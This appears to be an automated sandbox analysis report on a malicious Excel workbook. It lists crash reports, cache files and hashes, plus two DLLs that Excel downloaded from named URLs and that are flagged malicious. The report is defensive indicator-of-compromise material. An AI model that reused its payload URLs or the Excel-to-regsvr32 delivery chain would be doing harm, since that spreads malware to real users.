                                                                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.9.0.3.4.3.3.9.2.6.2.4.2.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.f.8.3.d.b.4.2.-.1.a.3.7.-.4.4.1.4.-.a.2.5.1.-.3.6.0.3.5.8.a.2.0.6.a.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.d.c.1.3.a.9.6.-.8.4.0.8.-.4.2.b.b.-.9.5.0.9.-.b.c.d.c.7.b.9.d.1.6.9.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.e.g.s.v.r.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.E.G.S.V.R.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.4.-.0.0.0.0.-.0.0.1.b.-.1.1.f.1.-.b.e.0.b.2.a.6.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.6.3.0.f.6.0.e.7.3.4.5.4.6.7.0.a.7.d.9.b.6.4.c.9.8.b.4.7.9.8.d.1.d.e.8.8.7.2.!.r.e.g.s.v.r.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.1././.0.4././.0.9.:.1.7.:.2.8.:.2.3.
                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_d6c4e44bbad4515086a963364165f93d4a33398_7a325c51_18b8e3a9\Report.wer
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):11464
                                                                                                                                                              Entropy (8bit):3.773207090548546
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:Gzc1Gb6VrcH/RS5uGXx3RjetA/u7szS274ItU3:Acm6VY/RS5n3jeC/u7szX4ItU3
                                                                                                                                                              MD5:B8504E07BB98A9D64FDEFBDF41F194D5
                                                                                                                                                              SHA1:202315861F4D0805683956B4421BEC4844871BA0
                                                                                                                                                              SHA-256:C0CA2062F7E533046149967CF764CBB505F0FB7D8FC8D0A9381B4C6665ABA9EF
                                                                                                                                                              SHA-512:1B06CC46BECB26BF63C31F242165B2A634EC8B393F1D3807868E9BF836D7EF05041DBB3230229D1E6E1E17EDF7D8C04BD0884F9B70654046CE863E737B2A77DB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.9.0.3.4.4.4.4.6.9.9.6.3.2.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.6.a.1.e.0.b.-.3.0.c.1.-.4.a.2.6.-.9.6.0.2.-.c.c.e.e.6.4.6.7.d.e.0.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.d.a.7.8.d.b.4.-.1.9.b.0.-.4.4.6.d.-.a.2.c.d.-.4.f.3.3.7.d.4.9.7.1.8.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.e.g.s.v.r.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.E.G.S.V.R.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.2.c.-.0.0.0.0.-.0.0.1.b.-.3.d.f.c.-.6.5.4.b.2.a.6.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.6.3.0.f.6.0.e.7.3.4.5.4.6.7.0.a.7.d.9.b.6.4.c.9.8.b.4.7.9.8.d.1.d.e.8.8.7.2.!.r.e.g.s.v.r.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.1././.0.4././.0.9.:.1.7.:.2.8.:.2.3.
                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER3993.tmp.dmp
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Thu Jun 24 18:52:20 2021, 0x1205a4 type
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):34208
                                                                                                                                                              Entropy (8bit):2.6006270724495497
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:cUNV+FKctFAK58zi/LWHQMW+N8MLOglhcH8xNzudDnn5z:KKGFAK/6H7GuhcHGNyFn5z
                                                                                                                                                              MD5:17AD30916C50EA6F0F1F9B852E3C23C9
                                                                                                                                                              SHA1:88637E18C09D821EE93D7EA5FF68CB8626F4CE01
                                                                                                                                                              SHA-256:6B0849C5A3AA9AE4DFC4207CD1D074A38AE95B467098D2AF1EB18598856BC9F8
                                                                                                                                                              SHA-512:07F1B9B19DDE2E6DEA46B4F48684F482DF33CDBCEB1110BDEA3CFA3F3230AD2CD9B1734F180900257262739769B2EE8A23974C244EA7CA15D270D0341E600CF9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: MDMP....... .......d..`...................U...........B..............GenuineIntelW...........T...........]..`.............................@..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER400C.tmp.WERInternalMetadata.xml
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8248
                                                                                                                                                              Entropy (8bit):3.69375614707593
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:Rrl7r3GLNiDP6iQe6YfCSUDgmfJ7Sqx+pBB89begsfaKm:RrlsNir606YaSUDgmfJ7Sqpezfu
                                                                                                                                                              MD5:1830660BB14C11F682D01FDFCB1A65E7
                                                                                                                                                              SHA1:5D37220F3D7049C206092E9D4ECA4BF2CBADCA9C
                                                                                                                                                              SHA-256:E8072C1D35E368BEB6A0290D2C072B13C15022330BA27C12B35B650917224032
                                                                                                                                                              SHA-512:1C62B2BBB157F583A8BD9CABFA733D4A3F6006F0B073F94BB5775E7BF07E2D8066EC6519488CC987A0A9517A55A2291CB7C5F267AFC683F75A04E1CBE97A85B7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.9.2.<./.P.i.d.>.......
                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER44C1.tmp.xml
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4620
                                                                                                                                                              Entropy (8bit):4.450374572187856
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:cvIwSD8zs1JgtWI9+RaPhWSC8B78fm8M4JkH+FhL+q8VYl+0KJYGgd:uITfPxVSNKJCSkoqYGgd
                                                                                                                                                              MD5:A5B1288A547EEE136D2F09E10142DDA9
                                                                                                                                                              SHA1:8B7CBF924B4F1C65A78FA570E69DEFFF5AD42427
                                                                                                                                                              SHA-256:C62F43EE967BF8D6F07D6EEE57C605D9C32A91EFAD615D68E00AC26224DBD6B3
                                                                                                                                                              SHA-512:0F6589301777CFD64F231AF020A1FA792B128057814C80992F455F54C7844B7438508A70CCB45A512C46D753E2100852B4B4F336C4C357FC5937C40F3F2CDD3B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1048563" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERD571.tmp.dmp
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Thu Jun 24 18:54:06 2021, 0x1205a4 type
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):34060
                                                                                                                                                              Entropy (8bit):2.6074160567654263
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:PlEZpIjo7oukkDRVlGTtW+N8MLOglhcRuIXZina:twIjWllnlGTnGuhcoUga
                                                                                                                                                              MD5:899EA0F9B3658B5A6CBCDE388DDD87EA
                                                                                                                                                              SHA1:E6AE09FDBB78C3574F568F9A66294526E6E07F1D
                                                                                                                                                              SHA-256:85C8876F48013E6696DA42267FA52DB78EB0384C49E73DA89DA49515F50FB894
                                                                                                                                                              SHA-512:2117864D8107504717FC927D62DC45DC6333E43B83C5B4A795C429CF486B7A719681E1716EB038FD8F70A67FF3BFDB2CD4E1056156AADE50E8957167267FB576
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: MDMP....... ..........`...................U...........B..............GenuineIntelW...........T.......,......`.............................@..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERDBDA.tmp.WERInternalMetadata.xml
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8248
                                                                                                                                                              Entropy (8bit):3.6920438867043095
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:Rrl7r3GLNiGH6v6YUhSUUgmfJ7Sqx+pBB89b1zsfHnm:RrlsNi26v6YaSUUgmfJ7Sqp1YfG
                                                                                                                                                              MD5:24537AA59C8A9FD673996B251C39DF65
                                                                                                                                                              SHA1:58403CB37FB659C2946440CB15D403F106872780
                                                                                                                                                              SHA-256:A84B497332A7DB46AE23866DAC6016EE700E45A3847825CB1A6B2B6B36761922
                                                                                                                                                              SHA-512:A181D4B291EEF4D7B7DD194A359384E2F7A7BD490AD891BE0BBB60D125FE0C365EBF984D3C327A59861B09B6CCC227187DE9B573EF3A9663565F8B4FBB9E516C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.0.0.<./.P.i.d.>.......
                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE3D.tmp.xml
                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4620
                                                                                                                                                              Entropy (8bit):4.448979618906682
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:48:cvIwSD8zsQJgtWI9+RaPhWSC8By8fm8M4JkH+Fd+q8VYv0KJYkgd:uITfWxVSNRJCik1qYkgd
                                                                                                                                                              MD5:DF34FAC632E99E2364AA9BF692327B38
                                                                                                                                                              SHA1:012B4B7C31FC1C326FC6E58EFF056F0D608E41EC
                                                                                                                                                              SHA-256:80B809F00095397594C3B5D4068CD96145C915364638AA1EA2A871BE1D06BDEB
                                                                                                                                                              SHA-512:8855D849B6B56E50B6B4DA1FE66C0B980702FBF0D24BB300B7BF93D6EFA22EAA3626FC9F8730E28854493C9917FC2034850741F815AAD57D48B0865551444C98
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1048564" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\A1BC798F-5F72-4EA3-BE7B-898818256BFB
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):134914
                                                                                                                                                              Entropy (8bit):5.367850460063856
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:KcQIKNgeBXA3gBwlpQ9DQW+z7Y34ZliKWXboOidX5E6LWME9:GEQ9DQW+zvXO1
                                                                                                                                                              MD5:03B5A85182D5248D0EB0960BC5338E31
                                                                                                                                                              SHA1:09F017611A33578A990E1F714212B2A4158DE7E8
                                                                                                                                                              SHA-256:6843F38B0F450A390FB39DB999FE2896170EEE8F192D282A49A302A97A17BBE9
                                                                                                                                                              SHA-512:14F73A61113E3833D52310E6FFF76CEDD13B2C5600CB8A7792F72041D84F21E045CF9308F5DE81B11A3D96E498E3214301BD612AFE74E17610D844F367EA6395
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-24T18:51:55">.. Build: 16.0.14222.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7716717F.png
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:PNG image data, 1133 x 589, 8-bit/color RGB, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):75711
                                                                                                                                                              Entropy (8bit):7.915372969602997
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:gxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncT:7br0o45GUgHhX8jC9yST
                                                                                                                                                              MD5:8296338A43942E3107802E3062AC1270
                                                                                                                                                              SHA1:46E67A586ED8A961AF7FD03140547C1CB2BAC227
                                                                                                                                                              SHA-256:BE5F61F2AE8E4C9F9ADBCE5EC33D4C01A331734FFC5818AA8E45CF60456C5ABD
                                                                                                                                                              SHA-512:C2179050A009C990CBFE6EA45E44AA6307AAC938E3EA523D31713F657E09131B07ACEBB31FC353C5A23E7D6323C4EC01736CFF092ACA1D49B58E71A07F1171AD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: .PNG........IHDR...m...M......p......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^......g......q.|.....<...'r....-^..c.If.,ffX1K.[....Z....V.LO5L..J+...z.]]u..>.==.......................Q..........(.......p.t........8.:.............................g@G........3............Q..........(.......p.t........8.:.............................g@G........3............Q..........(.......p.t......j.7ZP...:...0S....z5T........).WU=j.*.$H.B.P.)l.6Q..'.l..7..k..J.o..._....6..{C...r.|2W.[a...m.BI.?...5......D....4;B...@b.HiP.jfj}@.S9..E.*J...O..BA5.e:...q!.SP....w....(..._.,..I.|a.7+>.........A#......3v..37......w(..j...C.R..H3.f.Q....0....h~...)aM..).vQ.1..+J@Q.....Oa+...!5.e.b...V..|..d../.......vC..&..=9...n.....^6-.tRj...O..{j.e.N....o..~..^.......#!...T...C.#.>.E,[.,......E....h~B.Y./....(2.......(...`....~w#.%..R..{........N.Z....k]8>..dW..^s....U...9...W.e...]...W...i.{u.>.s.,L.>1..)....f..b..Z.nai$.Q.."...W2.......Q...G...z....Ea......
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ka[1].htm
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):302512
                                                                                                                                                              Entropy (8bit):6.5099091174634305
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:EYtPEybzPqbV7WQY6n519eBvQfMN46aCsowDvVJa:TtPZ7qbV7XY6nl8IfMNcCHkv/
                                                                                                                                                              MD5:E1CE7B3C5E793A6C5A2BE7801695DB58
                                                                                                                                                              SHA1:633801464F9C064D6BDE4FA568177872F2354532
                                                                                                                                                              SHA-256:2C93B9A196190AD2E08D31102BEC4FC3AC3B6B732D3B5F6EEF3E1BF5FD017C4B
                                                                                                                                                              SHA-512:5AF5CB784AB47208904D8D00BC5EAE9638779FD48D6EDAC3F74301E729131491AA6F46B5545534389F814FA4E9A8DB2175C5F06948D5E5EA1207249C224C2ABD
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                              IE Cache URL:https://carpascapital.com/gBPg8MtsGbv/ka.html
                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]e.......................$......Rich............PE..L...I..`...........!.........&......1a....... ...............................`....................................... ..Q...4R..d....................................................................................R..4............................code............................... ..`.edata..Q.... ......................@..@.rdataf..#...0...$..................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\ka[1].htm
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):302521
                                                                                                                                                              Entropy (8bit):6.509780411812991
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:EYtPEybzPqbV7WQY6n519eBvQfMN46aCsowDvVJa:TtPZ7qbV7XY6nl8IfMNcCHkv/
                                                                                                                                                              MD5:35D8C462B24EABCEEB247BF5C6FF07C2
                                                                                                                                                              SHA1:AF7E0EDE0EEB55F094D689E3C493FFAFAFD8A49F
                                                                                                                                                              SHA-256:4ACA6B14EA5A7CD1D61F615D6B0665DA8870981C57DDD10203DD1C2E52D5190B
                                                                                                                                                              SHA-512:56E5E27043E850BEF5ED86419131D2D2100F1A98A58CC68E64325391B96C4D1076F32BAB3D0320F83C0ABC38792AAEB0974E8A5F78ED8F9E1087E150F56378C6
                                                                                                                                                              Malicious:true
                                                                                                                                                              IE Cache URL:https://gruasphenbogota.com/C74hwGGxi/ka.html
                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]e.......................$......Rich............PE..L...I..`...........!.........&......1a....... ...............................`....................................... ..Q...4R..d....................................................................................R..4............................code............................... ..`.edata..Q.... ......................@..@.rdataf..#...0...$..................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\F5C40000
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):113223
                                                                                                                                                              Entropy (8bit):7.875783115355491
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:1536:PKYUOtOpEknvGrnxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncVCd:PKY45br0o45GUgHhX8jC9ySVC
                                                                                                                                                              MD5:E7CDABA9352809BC7F9AECA6A7909863
                                                                                                                                                              SHA1:F2591E410316D5970C33974E1E9B5BEAACEB2955
                                                                                                                                                              SHA-256:212B90AE445DFA7DFE07681DAE33A2BDB4AC75305D6F593C1676731B87F40614
                                                                                                                                                              SHA-512:1C216AD9E63291FB9EBCC2F39161CCF670168E9A34837CC8D74487D65BA24214EFF4DB2C8CAFEACB4B2DD0BF9880712DFB76359AE4E0D08F78442DFE1540B6DD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: ...N.1....x...h.EUU..h. .>..>.X.M>....3....U......./....#&2.........U/~..h...2x.6x...I\-.>....a..^.9.R....u!..eH.2......By9.}.*..>..x...;.....z..;..W....W.za\.vyP......h...s..^..jG...u..&.9..#...fz.0.nx1....B.?.1..X....>.uw.P:jq..v4 ..J...E.....$U%...xG...k.ri....oSG1!.j.lWfR.'8*..b|.......L.e>z(....W..@.[.....3.J. .................?N_...X.....".%...W....l.)..W....'r....X.8..@..W..........PK..........!.j.9.............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H......
                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):22
                                                                                                                                                              Entropy (8bit):2.9808259362290785
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                              MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                              SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                              SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                              SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                              C:\Users\user\Desktop\~$plan-1053707320.xlsb
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):165
                                                                                                                                                              Entropy (8bit):1.6081032063576088
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                              MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                              SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                              SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                              SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                              Malicious:true
